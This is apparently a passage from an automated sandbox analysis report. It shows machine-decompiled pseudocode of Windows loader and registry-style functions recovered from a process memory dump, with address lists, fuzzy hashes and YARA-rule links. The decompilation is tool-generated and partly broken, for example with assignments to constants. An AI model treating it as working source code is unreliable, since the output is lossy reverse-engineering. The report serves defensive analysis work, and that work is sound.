									E0102F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E00FFFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x10db1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0102B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x01015142
0x0101514c
0x01015150
0x01015157
0x01015159
0x0101515e
0x01015165
0x01015169
0x0101516c
0x01015172
0x01015176
0x0101517a
0x0101517a
0x0101517a
0x0101517f
0x01056d8b
0x01056d8e
0x01056d91
0x01056d95
0x01056d98
0x01056d9c
0x01056da0
0x01056da3
0x01056da7
0x01056e26
0x01056e26
0x01056e2a
0x010151f9
0x010151f9
0x010151fe
0x01056e33
0x01056e33
0x01056e39
0x01056e3d
0x01056e46
0x01056e50
0x00000000
0x00000000
0x01056e52
0x01056e53
0x01056e56
0x01056e5d
0x00000000
0x00000000
0x00000000
0x01056e5f
0x01056e67
0x01056e77
0x01056e7f
0x01056e80
0x01056e88
0x01056e90
0x01056e9f
0x01056ea5
0x01056ea9
0x01056eb1
0x01056ebf
0x00000000
0x00000000
0x01056ecf
0x01056ed3
0x00000000
0x00000000
0x01056edb
0x01056ede
0x01056ee1
0x01056ee8
0x01056eeb
0x01056eed
0x01056ef0
0x01056ef4
0x01056ef8
0x01056efc
0x00000000
0x00000000
0x01056f0d
0x01056f11
0x01056f32
0x01056f37
0x01056f3b
0x01056f3e
0x01056f41
0x01056f46
0x00000000
0x00000000
0x01056f4c
0x01056f50
0x01056f50
0x01056f54
0x01056f62
0x01056f65
0x01056f6d
0x01056f7b
0x01056f7b
0x01056f93
0x01056f98
0x01056fa0
0x01056fa6
0x01056fb3
0x01056fb6
0x01056fbf
0x01056fc1
0x01056fd5
0x01056fda
0x01056fda
0x01056fdd
0x01056fe2
0x01056fe7
0x01056feb
0x01056fef
0x01056ff3
0x0101520c
0x0101520c
0x0101520f
0x01015215
0x01015234
0x0101523a
0x0101523a
0x01015244
0x01015245
0x01015246
0x01015251
0x01015251
0x01056f13
0x01056f17
0x01056f17
0x01056f18
0x01056f1b
0x01056f1f
0x01056f23
0x00000000
0x01056f28
0x01015204
0x01015204
0x01015208
0x00000000
0x01015208
0x01015185
0x01015188
0x0101518a
0x0101518e
0x01015195
0x01056db1
0x01056db5
0x01056db9
0x0101519b
0x0101519b
0x0101519e
0x010151a7
0x010151a9
0x010151a9
0x010151b5
0x010151b8
0x010151bb
0x010151be
0x010151c1
0x010151c5
0x010151c9
0x010151cd
0x010151cd
0x010151d8
0x010151dc
0x010151e0
0x01056dcc
0x01056dd0
0x01056dd5
0x01056ddd
0x01056de1
0x01056de1
0x01056de5
0x01056deb
0x01056df1
0x01056df7
0x01056dfd
0x01056e01
0x01056e05
0x01056e09
0x01056e0d
0x01056e11
0x01056e11
0x010151eb
0x01056e1a
0x01056e1f
0x01056e21
0x01056e23
0x00000000
0x010151f1
0x010151f1
0x00000000
0x010151f1

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8035dfebaf3b74db4286fcba9aa22d21b6f5120a4e59bc744b3ec9d2d956fe2
Instruction ID: 83049ef9dcb2c374849a235ed24b54e404256e4837f4472eb7aa50790d5caa2f
Opcode Fuzzy Hash: b8035dfebaf3b74db4286fcba9aa22d21b6f5120a4e59bc744b3ec9d2d956fe2
Instruction Fuzzy Hash: E8C130755093818FD394CF28C480A5AFBE1BF89304F544AAEF9D98B392D735E845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 010103E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E010103E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x10dd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01010548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0102B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E00FFB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x10d7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01007D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01007D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01067016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01029830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E010669A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x10d7c04 != 0) {
						_t118 = _v12;
						_t120 = E0106A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x10d7bd8;
						if( *0x10d7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E010295D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E010299A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01063540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E00FEB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0102AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x10d8474 - 3;
										if( *0x10d8474 != 3) {
											 *0x10d79dc =  *0x10d79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01007D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01007D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01067016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x10d8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x10d7b00; // 0x0
							asm("ror esi, cl");
							 *0x10db1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E010295D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E00FF7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x010103f1
0x010103f7
0x010103f9
0x010103fb
0x010103fd
0x01010400
0x0101040a
0x01054c7a
0x01010537
0x01010547
0x01010410
0x01010410
0x01010414
0x01010417
0x0101041a
0x01010421
0x01010424
0x0101042b
0x0101043b
0x0101043e
0x0101043f
0x0101043f
0x01010446
0x01010449
0x0101044c
0x0101044f
0x01010459
0x01054c8d
0x0101045f
0x0101045f
0x0101045f
0x01010467
0x01054c97
0x01054c9d
0x01054ca4
0x01054caa
0x01054caf
0x01054cb1
0x01054cc3
0x01054cb3
0x01054cbc
0x01054cbc
0x01054cc8
0x01054ccb
0x01054cd7
0x01054cda
0x01054cdf
0x01054cdf
0x01054ccb
0x01054ca4
0x0101046d
0x0101046f
0x0101046f
0x01010471
0x01010476
0x0101047a
0x0101047b
0x01010483
0x01010489
0x0101048d
0x00000000
0x00000000
0x01054ce9
0x01054cef
0x01054d22
0x01054d22
0x00000000
0x01054d22
0x01054cf1
0x01054cf7
0x00000000
0x00000000
0x01054cf9
0x01054cff
0x00000000
0x00000000
0x01054d05
0x01054d07
0x00000000
0x00000000
0x01054d0d
0x01054d0f
0x01054d14
0x01054d16
0x00000000
0x00000000
0x01054d1c
0x01054d1c
0x01010499
0x01010535
0x01010535
0x00000000
0x01010535
0x010104a6
0x01054d2c
0x01054d37
0x01054d39
0x01054d3b
0x00000000
0x00000000
0x01054d41
0x01054d48
0x01010527
0x0101052b
0x0101052d
0x01010530
0x01010530
0x00000000
0x0101052b
0x01054d4e
0x010104ac
0x010104ac
0x010104af
0x010104b2
0x010104b7
0x010104b9
0x010104bb
0x010104bd
0x010104bf
0x010104c5
0x010104c9
0x01054d53
0x01054d59
0x01054db9
0x01054dba
0x01054dbf
0x01054dc2
0x01054dc4
0x01054dc7
0x01054dce
0x00000000
0x01054dce
0x01054d5b
0x01054d61
0x00000000
0x00000000
0x01054d63
0x01054d69
0x00000000
0x00000000
0x01054d6b
0x01054d6e
0x01054d74
0x01054d76
0x01054d7c
0x01054d7e
0x01054d84
0x01054d89
0x01054d8c
0x01054d8d
0x01054d92
0x01054d95
0x01054d96
0x01054d98
0x01054d9a
0x01054d9f
0x01054da4
0x01054da6
0x01054da8
0x01054daf
0x01054db1
0x01054db1
0x01054daf
0x01054da6
0x01054d84
0x01054d7c
0x00000000
0x01054d74
0x010104d6
0x01054de1
0x010104dc
0x010104dc
0x010104dc
0x010104e4
0x01054deb
0x01054df1
0x01054df8
0x01054dfe
0x01054e03
0x01054e05
0x01054e17
0x01054e07
0x01054e10
0x01054e10
0x01054e1c
0x01054e1f
0x01054e35
0x01054e35
0x01054e1f
0x01054df8
0x010104f1
0x010104fa
0x01054e3f
0x01054e47
0x01054e5b
0x01054e61
0x01054e67
0x01054e69
0x01054e71
0x01054e73
0x01010500
0x01010500
0x01010500
0x010104fa
0x01010508
0x0101051d
0x0101051d
0x0101051f
0x01010524
0x00000000
0x01010524
0x01010515
0x01010517
0x01054e7a
0x01054e7c
0x00000000
0x00000000
0x01054e85
0x00000000
0x01054e85
0x00000000
0x01010517

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8839e148b833daef377447e4ad663115ca87575722f5a49366a5942c9282bf4
Instruction ID: c3e968f067e96caa4a9417e80f07f41a99be4a726ee6f86d293658605e134f65
Opcode Fuzzy Hash: d8839e148b833daef377447e4ad663115ca87575722f5a49366a5942c9282bf4
Instruction Fuzzy Hash: 68910971E002159FEB71AA6CC844BEE7BE4AB05714F0502A5FDD1EB2D9EB789C80C791

Uniqueness

Uniqueness Score: -1.00%

Function 00FEC600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00FEC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x10dd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E00FF6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0102B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x10d7b9c; // 0x0
					_t74 = L01004620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E01029650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L010077F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0102F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E010213C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L010077F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E01029650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x00fec608
0x00fec615
0x00fec625
0x00fec62d
0x00fec635
0x00fec640
0x00fec680
0x00fec687
0x00fec688
0x00fec689
0x00fec694
0x00fec694
0x00fec642
0x00fec64a
0x00fec697
0x01057a25
0x01057a2b
0x01057a2e
0x01057a30
0x01057bea
0x01057bea
0x00000000
0x01057bea
0x01057a36
0x01057a43
0x01057a48
0x01057a4c
0x01057a4e
0x00000000
0x00000000
0x01057a58
0x01057a5a
0x01057a5b
0x01057a5c
0x01057a5d
0x01057a63
0x01057a64
0x01057a6a
0x01057a6c
0x01057a6e
0x010579cb
0x010579cb
0x010579ce
0x010579d0
0x01057a98
0x01057a9b
0x01057a9b
0x01057a9e
0x01057aa1
0x01057bbe
0x01057bbe
0x01057bc0
0x01057be0
0x01057be0
0x01057a01
0x01057a01
0x01057a05
0x01057a07
0x01057a15
0x01057a15
0x01057a1a
0x00000000
0x01057a1a
0x01057bc2
0x01057bc6
0x01057bc9
0x01057bcd
0x01057bcf
0x010579e6
0x010579e6
0x010579eb
0x010579eb
0x010579ef
0x010579f1
0x00000000
0x00000000
0x010579f3
0x010579f5
0x010579ff
0x010579ff
0x00000000
0x010579ff
0x010579f7
0x010579fd
0x00000000
0x00000000
0x00000000
0x010579fd
0x01057bd5
0x01057bd8
0x00000000
0x00000000
0x01057ba9
0x01057bac
0x01057bb0
0x01057bb1
0x01057bb1
0x01057bb6
0x00000000
0x01057bb6
0x01057aa7
0x01057aaa
0x00000000
0x00000000
0x01057ab2
0x01057ab3
0x01057ab5
0x01057aec
0x01057aef
0x01057b25
0x01057b28
0x01057b62
0x01057b64
0x01057b8f
0x01057b92
0x01057b96
0x01057b98
0x00000000
0x00000000
0x01057b9e
0x01057b9f
0x01057ba3
0x00000000
0x01057ba3
0x01057b66
0x01057b68
0x01057ae2
0x01057ae2
0x00000000
0x01057ae2
0x01057b6e
0x01057b72
0x01057b75
0x01057b81
0x01057b85
0x01057b87
0x00000000
0x00000000
0x01057b31
0x01057b34
0x01057b3c
0x01057b45
0x01057b46
0x01057b4f
0x01057b51
0x01057b57
0x01057b59
0x01057b59
0x00000000
0x01057b59
0x01057b77
0x00000000
0x01057b77
0x01057b2a
0x00000000
0x01057b2a
0x01057af1
0x01057af3
0x00000000
0x00000000
0x01057afb
0x01057afc
0x01057afe
0x00000000
0x00000000
0x01057b00
0x01057b03
0x00000000
0x00000000
0x01057b05
0x01057b09
0x01057b0d
0x01057b0f
0x00000000
0x00000000
0x01057b18
0x01057b1d
0x00000000
0x01057b1d
0x01057ab7
0x01057ab9
0x00000000
0x00000000
0x01057abf
0x01057ac1
0x00000000
0x00000000
0x01057ac3
0x01057ac6
0x00000000
0x00000000
0x01057ac8
0x01057acc
0x01057ad0
0x01057ad2
0x00000000
0x00000000
0x01057adb
0x00000000
0x01057adb
0x010579d6
0x010579d9
0x010579dc
0x01057a91
0x01057a94
0x00000000
0x01057a94
0x010579e2
0x00000000
0x010579e2
0x01057a74
0x01057a7a
0x00000000
0x00000000
0x01057a8a
0x01057a21
0x01057a21
0x00000000
0x01057a21
0x00fec650
0x00fec651
0x00fec656
0x00fec65c
0x00fec65d
0x00fec663
0x00fec664
0x00fec66a
0x00fec66e
0x010579c5
0x010579c7
0x00000000
0x010579c7
0x00fec67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf27210d58167a73c32a324ad19fc6633702eed789df4818a98a4f191a2ffe05
Instruction ID: 781ee5f66caf191f3464b30122eb50fc78bf57d00a4892c98ad7a8118e926f20
Opcode Fuzzy Hash: bf27210d58167a73c32a324ad19fc6633702eed789df4818a98a4f191a2ffe05
Instruction Fuzzy Hash: 8381A2756042428BEBA6CE58C880B7F77E9FB84350F54486AEEC59B241D330DD45DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01066DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E01066DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01066B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E01007D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E01029AE0();
					_t87 = L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0106795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0106795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0106795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0106795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L01004620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01066B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
